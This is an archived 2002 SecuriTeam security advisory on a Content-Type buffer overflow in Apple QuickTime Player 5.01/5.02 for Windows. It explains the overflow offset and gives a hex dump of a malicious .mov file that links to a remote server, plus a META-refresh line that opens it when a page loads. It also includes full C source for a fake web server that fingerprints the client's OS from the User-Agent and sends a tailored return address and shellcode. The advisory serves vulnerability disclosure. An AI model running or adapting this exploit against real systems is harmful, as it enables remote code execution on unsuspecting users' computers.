[NT] Apple QuickTime Player "Content-Type" Buffer Overflow
From: support@securiteam.comDate: 02/09/02
- Previous message: support@securiteam.com: "[NT] ISS BlackICE Exploitable Kernel Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sat, 9 Feb 2002 15:59:38 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Apple QuickTime Player "Content-Type" Buffer Overflow
------------------------------------------------------------------------
SUMMARY
QuickTime Player can get the file that is published on web server and play
it, QuickTime Player overflows when a web server sends an HTTP response
that contains a long "Content-Type". This buffer overflow overwrites the
local buffer, which is then executed on the client host.
DETAILS
Vulnerable systems:
* QuickTime Player 5.01 for Windows (Japanese)
* QuickTime Player 5.02 for Windows (Japanese)
Details:
QuickTime Player overflows when it connects to the web server that sends
the following HTTP response.
HTTP/1.1 200 OK
Date: Wed, 06 Feb 2002 06:56:30 GMT
Server: Apache/1.3.19
Last-Modified: Tue, 15 May 2001 13:37:51 GMT
ETag: "1e001d-7b5-3b01312f"
Accept-Ranges: bytes
Content-Length: 1973
Content-Type: aaaaaaaaaaaa.. long string ..aaaaaaaaaaaaa
You can confirm the buffer overflow if you specify long string (about
500bytes) at the line of Content-Type. RET address is stored in offset
456, if the address of JMP ESP code is specified to RET address, the code
written in the buffer for Content-Type is executed.
You can create a "mov" file that links to fake webserver by creating the
following file structure:
exploit.mov
ADDRESS 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
0123456789ABCDEF
----------------------------------------------------------------------
00000000 00 00 00 43 6D 6F 6F 76 00 00 00 3B 6D 64 72 61
..Cmoov...;mdra
00000010 00 00 00 33 64 72 65 66 75 72 6C 20 68 74 74 70 ...3drefurl
http
00000020 3A 2F 2F 77 77 77 2E 73 68 61 64 6F 77 70 65 6E
://www.shadowpen
00000030 67 75 69 6E 2E 6F 72 67 3A 32 32 32 2F 78 2E 6D
guin.org:222/x.m
00000040 6F 76 00 ov.
If such "mov" file is referenced by META tag, QuickTime overflows when
visitor opens the web page.
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=exploit.mov">
Furthermore, QuickTime Player sets the version of QuickTime Player and OS
to User-Agent as follows.
User-Agent: QuickTime (qtver=5.0.2;os=Windows NT 5.0Service Pack 2)
Exploit code can send EIP and egg code which are appropriate for
environment of connected client.
Avoidance:
If you use Internet Explorer, you can avoid this problem if ActiveX is
disabled. If you open "mov" file by QuickTime Player, you must check the
mov file manually for whether a hyperlink is included. If hyperlink is
specified in mov file, you must check that the "Content-Type" which is
sent from web server is not of a malicious nature.
Sample code:
This code provides a TCP service at port 2222. This faked web server
checks User-Agent which is sent by QuickTime Player and sets the
appropriate EIP and egg code (for WindowsXP (home)/2000 (pro)/98 (SE)).
/*======================================================================
Apple QuickTimePlayer 5.02/5.01 Exploit
for Windows XP Home edition
Windows2000 Professional (Service Pack 2)
Windows98 Second Edition
The Shadow Penguin Security (http://www.shadowpenguin.org)
Written by UNYUN (unyun@shadowpenguin.org)
=======================================================================
*/
#include <windows.h>
#include <windowsx.h>
#include <stdio.h>
#include <winsock.h>
#define SERVICE_PORT 2222
#define MAXBUF 4096
#define TGTBUFSIZE 500
#define NOP 0x90
#define RETOFS 456
#define CODEOFS 470
#define RETADR_2000pro 0x77e0af64
#define RETADR_XPhome 0x77e4fb71
#define RETADR_98SE 0xbfb92995
#define UA_2000PRO "Windows NT 5.0Service Pack 2"
#define UA_XPHOME "Windows NT 5.1"
#define UA_98SE "Windows 98 A "
#define ANSWER \
"HTTP/1.1 200 OK\r\n"\
"Date: Wed, 06 Feb 2002 06:56:30 GMT\r\n"\
"Server: Apache/1.3.19\r\n"\
"Last-Modified: Tue, 15 May 2001 13:37:51 GMT\r\n"\
"ETag: \"1e001d-7b5-3b01312f\"\r\n"\
"Accept-Ranges: bytes\r\n"\
"Content-Length: 1973\r\n"\
"Content-Type: %s\r\n\r\n"
static unsigned char egg_2000pro[512]={
0xB8,0xA5,0xFA,0xE1,0x77,0x33,0xDB,0xB3,
0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD
};
static unsigned char egg_XPhome[512]={
0xB8,0xe3,0x02,0xd4,0x77,0x33,0xDB,0xB3,
0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD
};
static unsigned char egg_98se[512]={
0xB8,0x2c,0x23,0xf5,0xbf,0x33,0xDB,0xB3,
0x05,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD
};
int main(int argc,char *argv[])
{
WSADATA wsa;
SOCKADDR_IN sAddr,clientAddr;
SOCKET sock_listen,sock;
int nClientAddrLen=sizeof(clientAddr);
static char packetbuf[MAXBUF*2];
static char buf[MAXBUF],recvbuf[MAXBUF];
int r;
unsigned int eip;
char *p,*q,*qtver,*os;
unsigned char *egg;
// Create socket and wait connection
WSAStartup(MAKEWORD(2,0),&wsa);
sock_listen=socket(AF_INET,SOCK_STREAM,0);
sAddr.sin_family = AF_INET;
sAddr.sin_addr.s_addr = htonl(INADDR_ANY);
sAddr.sin_port = htons((u_short)(SERVICE_PORT));
bind(sock_listen,(SOCKADDR *)&sAddr,sizeof(sAddr));
listen(sock_listen,1);
printf("Waiting connection (Port %d)...\n",SERVICE_PORT);
sock=accept(sock_listen,(LPSOCKADDR)&clientAddr,&nClientAddrLen);
printf("Accepted [from %s].\n",inet_ntoa(clientAddr.sin_addr));
// Recv request
if ((r=recv(sock,recvbuf,sizeof(recvbuf)-1,0))==SOCKET_ERROR){
printf("Can not recv packet\n");
return(0);
}
recvbuf[r]='\0';
printf("---request------------------------------\n");
printf("%s\n",recvbuf);
printf("----------------------------------------\n");
if ((p=strstr(recvbuf,"User-Agent:"))==NULL){
printf("Can not select\n");
printf("%s\n",recvbuf);
exit(1);
}
if ((q=strchr(p,'\r'))!=NULL) *q='\0';
if ((qtver=strstr(p,"qtver="))==NULL){
printf("Version is not written in User-Agent\n");
printf("%s\n",p);
exit(1);
}
qtver+=6;
if ((q=strchr(qtver,';'))!=NULL) *q='\0';
printf("Client version = '%s'\n",qtver);
q++;
if ((p=strchr(q,')'))!=NULL) *p='\0';
if ((os=strstr(q,"os="))==NULL){
printf("OS name is not written in User-Agent\n");
printf("%s\n",q);
exit(1);
}
os+=3;
printf("Client OS = '%s'\n",os);
if (!strcmp(os,UA_XPHOME)){
eip=RETADR_XPhome;
egg=egg_XPhome;
printf("Target = WindowsXp Home\n");
}else if (!strcmp(os,UA_2000PRO)){
eip=RETADR_2000pro;
egg=egg_2000pro;
printf("Target = Windows2000 Professional (SP2)\n");
}else if (!strcmp(os,UA_98SE)){
eip=RETADR_98SE;
egg=egg_98se;
printf("Target = Windows98 Second Edition\n");
}else{
eip=RETADR_2000pro;
egg=egg_2000pro;
printf("Target = Unknown.\n");
}
// Make exploit
memset(buf,NOP,sizeof(buf));
buf[RETOFS ]=eip&0xff;
buf[RETOFS+1]=(eip>>8)&0xff;
buf[RETOFS+2]=(eip>>16)&0xff;
buf[RETOFS+3]=(eip>>24)&0xff;
strncpy(buf+CODEOFS,egg,strlen(egg));
buf[TGTBUFSIZE]='\0';
// Send exploit
sprintf(packetbuf,ANSWER,buf);
if (send(sock,packetbuf,strlen(packetbuf),0)==SOCKET_ERROR){
printf("Can not send packet\n");
return(0);
}
Sleep(1000);
closesocket(sock);
printf("Done\n");
return(0);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:unyun@shadowpenguin.org>
UNYUN.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] ISS BlackICE Exploitable Kernel Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
